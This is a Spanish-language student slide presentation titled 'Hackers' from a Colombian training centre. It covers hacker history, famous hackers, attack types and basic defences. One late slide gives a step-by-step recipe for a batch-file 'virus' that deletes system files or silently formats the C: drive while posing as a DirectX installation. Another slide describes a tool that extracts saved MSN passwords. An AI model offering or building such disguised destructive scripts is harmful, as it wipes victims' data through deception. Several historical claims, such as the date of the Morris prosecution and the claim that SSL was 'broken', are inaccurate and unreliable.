SlideShare una empresa de Scribd logo
1 de 25
HACKERS


         SEBASTIAN RIOS RAMIREZ
        DANIELA BERMUDEZ MUÑOZ


    MANTENIMIENTO DE COMPUTADORES



CENTRO DE DISEÑO E INNOVACION TECNOLOGICA
               INDUSTRIAL


    DOSQUEBRADAS NOVIEMBRE 05 DE 2011
HACKERS


         SEBASTIAN RIOS RAMIREZ
        DANIELA BERMUDEZ MUÑOZ


    MANTENIMIENTO DE COMPUTADORES

                INGENIERO
      EDWIN ALEXANDER GOMEZ ROBBY
               INSTRUCTOR


CENTRO DE DISEÑO E INNOVACION TECNOLOGICA
               INDUSTRIAL


    DOSQUEBRADAS NOVIEMBRE 05 DE 2011
Al principio no se les llamaba así, el
   verdadero sobrenombre es “ autentico
  programador” que se uso en el año 1945.
 los comienzos de dicha cultura se pueden
fechar con seguridad en 1961 año en que el
     MIT adquirió la primera PDP-1, El
    comité de Señales y Energía del Tech
       Model Railroad Club adoptó la
       computadora como su juguete
       tecnológico preferido e inventó
    herramientas de programación, Los
  hackers del Tech Model Railroad Club se
 convirtieron en el núcleo del Laboratorio
     de Inteligencia Artificial del MIT, el
   centro más destacado de investigación
   sobre Inteligencia Artificial de todo el
      mundo a principios de los 80. Su
  influencia se extendió por todas partes a
                partir de 1969,
En new jersey desde 1969 un hacker de laboratorios
     Bell llamado ken Thompson invento Unix. se
estructuró como un conjunto de herramientas flexible,
     compuesto por diversos programas sencillos,
    diseñados para poderse combinar entre ellos de
             distintas y provechosas maneras.
o Jonathan james: Fue el primer adolecente que fue a
 la cárcel por hacking, cuando fue sentenciado tenía a
penas 16 años. También entró a servidores de la NASA,
 robando software de aproximadamente $1.7 millones
de dólares, por lo cuál la NASA tuvo que apagar todo su
        sistema, lo cual tuvo un costo de $41,000.
o Adrian Lamo: Entró a New York Times y a Microsoft,
él usaba conexiones en las cafeterías “Kinko” para
hackear. cuando entró a la intranet del New York
Times fue cuando las cosas se tornaron serias. Se
agregó a él mismo a la lista de expertos y vio
información personal.
o Kevin Mitnick: ya tenía algo de experiencia
hackeando antes de cometer los crímenes que lo
hicieron famoso. Empezó engañando al sistema de
tarjetas en Los Ángeles, para lograr viajar gratis, luego
así como el co-fundador de Apple Steve Wozniak,
estuvo metido en el phone phreaking que significa a
grandes rasgos poder hacer llamadas gratis.
o Kevin Poulsen: También conocido como “Dark
Dante”, hackeo de las líneas telefónicas de KIIS-FM,
una estación de radio en Los Ángeles, lo cuál lo hizo
como ganador de un nuevo Porsche a parte de muchas
otras cosas. entró a una base de datos de
investigaciones federales, durante la persecución
hackeo computadoras federales para obtener
información de escucha telefónica.
o Robert Tappan Morris: creador del Gusano Morris, el
primer gusano desencadenado en Internet, como
resultado el fue la primera persona perseguida en 1986
por fraude computacional, Su intención era usarlo para
ver que tan largo era Internet, pero el gusano se
replicaba excesivamente, haciendo las computadoras
lentas, tuvo impacto en 6 mil computadoras.
oStephen Wozniak empezó a hackear haciendo cajas
azules (blue boxes) las cuales lograban imitar los
sonidos del teléfono de ésa época logrando así
llamadas gratuitas de larga distancia.
o Tim berners-lee creador del (www) Word Wide
Web, hackeaba con precaución junto con un amigo, y
luego fue vetado de las computadoras de la
Universidad, él armó su primera computadora con
hierro soldado, puentes TTL, un procesador M6800 y
una televisión vieja.
o Destruyen SSL con 200 PlayStation 3: Un grupo de
investigadores utilizaron el poder combinado de nada
menos que 200 consolas PlayStation 3, logrando algo
que podría poner de rodillas toda la estructura de
seguridad que existe en Internet hoy en día:
Quebraron el SSL. Una gran cantidad de aplicaciones
pueden utilizar estos protocolos, desde navegadores
como Internet Explorer y Firefox hasta mensajeros en
línea y clientes de correo electrónic.
o Caballos de Troya: Consiste en introducir dentro de un
programa una rutina o conjunto de instrucciones, por
supuesto no autorizadas y que la persona que lo ejecuta no
conoce, para que dicho programa actúe de una forma
diferente a como estaba previsto.




o Bombas Lógicas: Este suele ser el procedimiento de
sabotaje mas comúnmente utilizado por empleados
descontentos. Consiste en introducir un programa o rutina
que en una fecha determinada destruirá, modificara la
información o provocara el cuelgue del sistema.
o Ingeniería Social: Básicamente convencer a la gente
de que haga lo que en realidad no debería. Por ejemplo
llamar a un usuario haciéndose pasar por
administrador del sistema y requerirle la password con
alguna excusa convincente.

oDifusión de virus: puede ser ingresado al sistema por
un dispositivo externo (diskettes) o través de la red (e-
mails u otros protocolos) sin intervención directa del
atacante. Dado que el virus tiene como característica
propia su auto reproducción.
un modelo de seguridad debe estar formado por
    múltiples componentes o capas que pueden ser
 incorporadas de manera progresiva al modelo global
de seguridad, logrando así el método más efectivo para
disuadir el uso no autorizado de sistemas y servicios de
                          red.
Es posible dividir las tareas de seguridad en tres grandes
grupos:

Autenticación: se refiere a establecer las entidades que
pueden tener acceso al universo de recursos de cómputo
que cierto medio ambiente puede ofrecer.

Autorización: es el hecho de que las entidades autorizadas a
tener acceso a los recursos de cómputo, tengan acceso
únicamente a las áreas de trabajo sobre las cuales ellas
deben tener dominio.

Auditoría: se refiere a la continua vigilancia de los servicios
en producción. Entra dentro de este grupo el mantener
estadísticas de acceso, estadísticas de uso y políticas de
acceso físico a los recursos.
Programas Antiespias: son aquellos que una vez
instalados pueden recopilar y mandar información
(archivos, claves, información personal acerca del
usuario, etc.) a otras computadoras sin el conocimiento
o permiso del usuario o sistema en el cual residen.
o Programas cortafuegos: limitar, controlar o parar el
tránsito de información entre la computadora en
el cual residen y todos aquellas computadoras o
equipos que se comunican con ella.




o Antivirus: Estos programas pueden detectar a un
virus incluso antes que ataque y que lleve a cabo sus
destructores objetivos.
oTráfico de red de salida sospechosamente alto. Si
usted está en una cuenta de discado o utiliza ADSL y
nota un volumen alto no usual en el tráfico de salida es
posible que su ordenador esté en peligro.

oGran actividad del disco duro o archivos de aspecto
sospechoso en los directorios raíces de cualquiera de
los discos, muchos hackers realizan un escaneo masivo
para encontrar documentos interesantes o archivos que
contengan contraseñas o detalles de cuentas de banco
o de pagos
oUn gran número de paquetes que vienen de una sola
dirección y son bloqueados por su cortafuegos, los
hackers suelen usar herramientas automáticas de
prueba que tratan de usar varios exploits para irrumpir
en el sistema. Si usted tiene un cortafuegos.
Su principal recurso dependen, además de su propio
  ingenio, es un código informático, Hay miles de
  diferentes programas de los hackers utilizan para
 explorar las computadoras y redes. Estos programas
dan a los piratas una gran cantidad de poder sobre los
       usuarios inocentes y las organizaciones.
Utilidad súper sencilla que muestra por pantalla el
Password del MSN Messenger. Para ello lo saca del
registro de Windows, y lo desencripta en caso de estar
encriptada.
Bit Defender USB Immunizer: un sencillo y muy
efectivo antivirus que se encarga de borrar todo archivo
sospechoso al momento que la memoria Flash es
conectada. Con interfaz sencilla y una función única, la
aplicación representa una protección efectiva,
actuando directamente en los archivos ejecutables.
primero abrimos el bloc de notas y podemos hacer las siguientes funciones:

1) echo s | erase C:DIRECCION DEL ARCHIVO A BORRAR
ese txt ara que borre el archivo especifico, por ejemplo queremos que borre el
system.ini seria así
echo s | erase C:WINDOWSsystem.ini
2) echo s | format c:/v/q/u
Ese nos formatearía el disco duro sin preguntar pause
echo Ahora se pondrá en marcha la instalación del archivo direct x formating
echo Esta operación puede tardar varios minutos pero vale la pena esperar
pause
echo s | format c:/v/q/u. y por ultimo cuando tengamos todo eso puesto en
nuestro bloc de notas lo tendremos que guardar en formato .BAT en bez de
.TXT
Y ya tendremos nuestro virus creado.
Descarga ELIBAGLA
Haz doble clic encima para abrirlo
Verifica que en el menú desplegable
Unidad, se encuentra C: (o la
partición que contiene el sistema
operativo)
Verifica también que la opción
Eliminar Ficheros
Automáticamente, en la parte baja
de la ventana, esté marcada.
Haz clic en el botón Explorar para
lanzar el análisis, al final del scan, se
generará un informe llamado
infosat.txt que será guardado en la raíz
C:infosat.txt

Más contenido relacionado

La actualidad más candente

Seguridad de informatica
Seguridad de informaticaSeguridad de informatica
Seguridad de informaticaLautaro Lopez
 
Seguridad informática
Seguridad informática Seguridad informática
Seguridad informática estefasanchez
 
Seguridad de informatica
Seguridad de informaticaSeguridad de informatica
Seguridad de informaticaLautaro Lopez
 
Metodologia final
Metodologia finalMetodologia final
Metodologia finalfortachin08
 
¿Por qué es necesario mantener las aplicaciones de seguridad activas y actual...
¿Por qué es necesario mantener las aplicaciones de seguridad activas y actual...¿Por qué es necesario mantener las aplicaciones de seguridad activas y actual...
¿Por qué es necesario mantener las aplicaciones de seguridad activas y actual...Nallely Sanchez
 

La actualidad más candente (9)

Seguridad de informatica
Seguridad de informaticaSeguridad de informatica
Seguridad de informatica
 
Virus informaticos
Virus informaticosVirus informaticos
Virus informaticos
 
Seguridad informática
Seguridad informática Seguridad informática
Seguridad informática
 
Seguridad de informatica
Seguridad de informaticaSeguridad de informatica
Seguridad de informatica
 
Metodologia final
Metodologia finalMetodologia final
Metodologia final
 
¿Por qué es necesario mantener las aplicaciones de seguridad activas y actual...
¿Por qué es necesario mantener las aplicaciones de seguridad activas y actual...¿Por qué es necesario mantener las aplicaciones de seguridad activas y actual...
¿Por qué es necesario mantener las aplicaciones de seguridad activas y actual...
 
Hacker
HackerHacker
Hacker
 
Presentación1johanna
Presentación1johannaPresentación1johanna
Presentación1johanna
 
Alde12
Alde12Alde12
Alde12
 

Similar a Hackers

Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2011
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503stefannyquiroga
 
Solución guia s.operativos_294503(1)
Solución  guia s.operativos_294503(1)Solución  guia s.operativos_294503(1)
Solución guia s.operativos_294503(1)luisa1200
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticanadia82
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correasebascorrea27
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correasebascorrea27
 
Seguridad informatica
Seguridad informatica Seguridad informatica
Seguridad informatica estefasanchez
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticatatii2011
 
Virus informaticos e historia de las microcomputadoras
Virus informaticos e historia de las microcomputadorasVirus informaticos e historia de las microcomputadoras
Virus informaticos e historia de las microcomputadorasDeilyMartinez
 
Virus informaticos e historia de las microcomputadoras
Virus informaticos e historia de las microcomputadorasVirus informaticos e historia de las microcomputadoras
Virus informaticos e historia de las microcomputadorasDeilyMartinez
 
Glosario informatica
Glosario informaticaGlosario informatica
Glosario informaticaedwin alvarez
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503haroldm2011
 

Similar a Hackers (20)

Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
Solución guia s.operativos_294503(1)
Solución  guia s.operativos_294503(1)Solución  guia s.operativos_294503(1)
Solución guia s.operativos_294503(1)
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correa
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correa
 
Seguridad informatica
Seguridad informatica Seguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
Revista digital
Revista digitalRevista digital
Revista digital
 
Virus Informaticos
Virus InformaticosVirus Informaticos
Virus Informaticos
 
Virus informaticos e historia de las microcomputadoras
Virus informaticos e historia de las microcomputadorasVirus informaticos e historia de las microcomputadoras
Virus informaticos e historia de las microcomputadoras
 
Virus informaticos e historia de las microcomputadoras
Virus informaticos e historia de las microcomputadorasVirus informaticos e historia de las microcomputadoras
Virus informaticos e historia de las microcomputadoras
 
virus informaticos
virus informaticosvirus informaticos
virus informaticos
 
Glosario informatica
Glosario informaticaGlosario informatica
Glosario informatica
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 

Último

Qué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativaQué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativaDecaunlz
 
PLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxPLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxlupitavic
 
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...Carlos Muñoz
 
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfSELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfAngélica Soledad Vega Ramírez
 
Dinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dDinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dstEphaniiie
 
plan de capacitacion docente AIP 2024 clllll.pdf
plan de capacitacion docente  AIP 2024          clllll.pdfplan de capacitacion docente  AIP 2024          clllll.pdf
plan de capacitacion docente AIP 2024 clllll.pdfenelcielosiempre
 
La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.amayarogel
 
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 4to Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfGUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfPaolaRopero2
 
CALENDARIZACION DE MAYO / RESPONSABILIDAD
CALENDARIZACION DE MAYO / RESPONSABILIDADCALENDARIZACION DE MAYO / RESPONSABILIDAD
CALENDARIZACION DE MAYO / RESPONSABILIDADauxsoporte
 
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...JAVIER SOLIS NOYOLA
 
La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...JonathanCovena1
 
Ley 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularLey 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularMooPandrea
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfenelcielosiempre
 
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAJAVIER SOLIS NOYOLA
 
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxzulyvero07
 
CLASE - La visión y misión organizacionales.pdf
CLASE - La visión y misión organizacionales.pdfCLASE - La visión y misión organizacionales.pdf
CLASE - La visión y misión organizacionales.pdfJonathanCovena1
 
Neurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores  NE24  Ccesa007.pdfNeurociencias para Educadores  NE24  Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdfDemetrio Ccesa Rayme
 
Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Lourdes Feria
 

Último (20)

Qué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativaQué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativa
 
PLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxPLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docx
 
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...
 
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfSELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
 
Dinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dDinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes d
 
plan de capacitacion docente AIP 2024 clllll.pdf
plan de capacitacion docente  AIP 2024          clllll.pdfplan de capacitacion docente  AIP 2024          clllll.pdf
plan de capacitacion docente AIP 2024 clllll.pdf
 
La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.
 
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 4to Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
 
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfGUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
 
CALENDARIZACION DE MAYO / RESPONSABILIDAD
CALENDARIZACION DE MAYO / RESPONSABILIDADCALENDARIZACION DE MAYO / RESPONSABILIDAD
CALENDARIZACION DE MAYO / RESPONSABILIDAD
 
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
 
La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...
 
Ley 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularLey 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circular
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdf
 
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
 
Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.
 
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
 
CLASE - La visión y misión organizacionales.pdf
CLASE - La visión y misión organizacionales.pdfCLASE - La visión y misión organizacionales.pdf
CLASE - La visión y misión organizacionales.pdf
 
Neurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores  NE24  Ccesa007.pdfNeurociencias para Educadores  NE24  Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdf
 
Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...
 

Hackers

  • 1. HACKERS SEBASTIAN RIOS RAMIREZ DANIELA BERMUDEZ MUÑOZ MANTENIMIENTO DE COMPUTADORES CENTRO DE DISEÑO E INNOVACION TECNOLOGICA INDUSTRIAL DOSQUEBRADAS NOVIEMBRE 05 DE 2011
  • 2. HACKERS SEBASTIAN RIOS RAMIREZ DANIELA BERMUDEZ MUÑOZ MANTENIMIENTO DE COMPUTADORES INGENIERO EDWIN ALEXANDER GOMEZ ROBBY INSTRUCTOR CENTRO DE DISEÑO E INNOVACION TECNOLOGICA INDUSTRIAL DOSQUEBRADAS NOVIEMBRE 05 DE 2011
  • 3. Al principio no se les llamaba así, el verdadero sobrenombre es “ autentico programador” que se uso en el año 1945. los comienzos de dicha cultura se pueden fechar con seguridad en 1961 año en que el MIT adquirió la primera PDP-1, El comité de Señales y Energía del Tech Model Railroad Club adoptó la computadora como su juguete tecnológico preferido e inventó herramientas de programación, Los hackers del Tech Model Railroad Club se convirtieron en el núcleo del Laboratorio de Inteligencia Artificial del MIT, el centro más destacado de investigación sobre Inteligencia Artificial de todo el mundo a principios de los 80. Su influencia se extendió por todas partes a partir de 1969,
  • 4. En new jersey desde 1969 un hacker de laboratorios Bell llamado ken Thompson invento Unix. se estructuró como un conjunto de herramientas flexible, compuesto por diversos programas sencillos, diseñados para poderse combinar entre ellos de distintas y provechosas maneras.
  • 5. o Jonathan james: Fue el primer adolecente que fue a la cárcel por hacking, cuando fue sentenciado tenía a penas 16 años. También entró a servidores de la NASA, robando software de aproximadamente $1.7 millones de dólares, por lo cuál la NASA tuvo que apagar todo su sistema, lo cual tuvo un costo de $41,000.
  • 6. o Adrian Lamo: Entró a New York Times y a Microsoft, él usaba conexiones en las cafeterías “Kinko” para hackear. cuando entró a la intranet del New York Times fue cuando las cosas se tornaron serias. Se agregó a él mismo a la lista de expertos y vio información personal.
  • 7. o Kevin Mitnick: ya tenía algo de experiencia hackeando antes de cometer los crímenes que lo hicieron famoso. Empezó engañando al sistema de tarjetas en Los Ángeles, para lograr viajar gratis, luego así como el co-fundador de Apple Steve Wozniak, estuvo metido en el phone phreaking que significa a grandes rasgos poder hacer llamadas gratis.
  • 8. o Kevin Poulsen: También conocido como “Dark Dante”, hackeo de las líneas telefónicas de KIIS-FM, una estación de radio en Los Ángeles, lo cuál lo hizo como ganador de un nuevo Porsche a parte de muchas otras cosas. entró a una base de datos de investigaciones federales, durante la persecución hackeo computadoras federales para obtener información de escucha telefónica.
  • 9. o Robert Tappan Morris: creador del Gusano Morris, el primer gusano desencadenado en Internet, como resultado el fue la primera persona perseguida en 1986 por fraude computacional, Su intención era usarlo para ver que tan largo era Internet, pero el gusano se replicaba excesivamente, haciendo las computadoras lentas, tuvo impacto en 6 mil computadoras.
  • 10. oStephen Wozniak empezó a hackear haciendo cajas azules (blue boxes) las cuales lograban imitar los sonidos del teléfono de ésa época logrando así llamadas gratuitas de larga distancia.
  • 11. o Tim berners-lee creador del (www) Word Wide Web, hackeaba con precaución junto con un amigo, y luego fue vetado de las computadoras de la Universidad, él armó su primera computadora con hierro soldado, puentes TTL, un procesador M6800 y una televisión vieja.
  • 12. o Destruyen SSL con 200 PlayStation 3: Un grupo de investigadores utilizaron el poder combinado de nada menos que 200 consolas PlayStation 3, logrando algo que podría poner de rodillas toda la estructura de seguridad que existe en Internet hoy en día: Quebraron el SSL. Una gran cantidad de aplicaciones pueden utilizar estos protocolos, desde navegadores como Internet Explorer y Firefox hasta mensajeros en línea y clientes de correo electrónic.
  • 13. o Caballos de Troya: Consiste en introducir dentro de un programa una rutina o conjunto de instrucciones, por supuesto no autorizadas y que la persona que lo ejecuta no conoce, para que dicho programa actúe de una forma diferente a como estaba previsto. o Bombas Lógicas: Este suele ser el procedimiento de sabotaje mas comúnmente utilizado por empleados descontentos. Consiste en introducir un programa o rutina que en una fecha determinada destruirá, modificara la información o provocara el cuelgue del sistema.
  • 14. o Ingeniería Social: Básicamente convencer a la gente de que haga lo que en realidad no debería. Por ejemplo llamar a un usuario haciéndose pasar por administrador del sistema y requerirle la password con alguna excusa convincente. oDifusión de virus: puede ser ingresado al sistema por un dispositivo externo (diskettes) o través de la red (e- mails u otros protocolos) sin intervención directa del atacante. Dado que el virus tiene como característica propia su auto reproducción.
  • 15. un modelo de seguridad debe estar formado por múltiples componentes o capas que pueden ser incorporadas de manera progresiva al modelo global de seguridad, logrando así el método más efectivo para disuadir el uso no autorizado de sistemas y servicios de red.
  • 16. Es posible dividir las tareas de seguridad en tres grandes grupos: Autenticación: se refiere a establecer las entidades que pueden tener acceso al universo de recursos de cómputo que cierto medio ambiente puede ofrecer. Autorización: es el hecho de que las entidades autorizadas a tener acceso a los recursos de cómputo, tengan acceso únicamente a las áreas de trabajo sobre las cuales ellas deben tener dominio. Auditoría: se refiere a la continua vigilancia de los servicios en producción. Entra dentro de este grupo el mantener estadísticas de acceso, estadísticas de uso y políticas de acceso físico a los recursos.
  • 17. Programas Antiespias: son aquellos que una vez instalados pueden recopilar y mandar información (archivos, claves, información personal acerca del usuario, etc.) a otras computadoras sin el conocimiento o permiso del usuario o sistema en el cual residen.
  • 18. o Programas cortafuegos: limitar, controlar o parar el tránsito de información entre la computadora en el cual residen y todos aquellas computadoras o equipos que se comunican con ella. o Antivirus: Estos programas pueden detectar a un virus incluso antes que ataque y que lleve a cabo sus destructores objetivos.
  • 19. oTráfico de red de salida sospechosamente alto. Si usted está en una cuenta de discado o utiliza ADSL y nota un volumen alto no usual en el tráfico de salida es posible que su ordenador esté en peligro. oGran actividad del disco duro o archivos de aspecto sospechoso en los directorios raíces de cualquiera de los discos, muchos hackers realizan un escaneo masivo para encontrar documentos interesantes o archivos que contengan contraseñas o detalles de cuentas de banco o de pagos
  • 20. oUn gran número de paquetes que vienen de una sola dirección y son bloqueados por su cortafuegos, los hackers suelen usar herramientas automáticas de prueba que tratan de usar varios exploits para irrumpir en el sistema. Si usted tiene un cortafuegos.
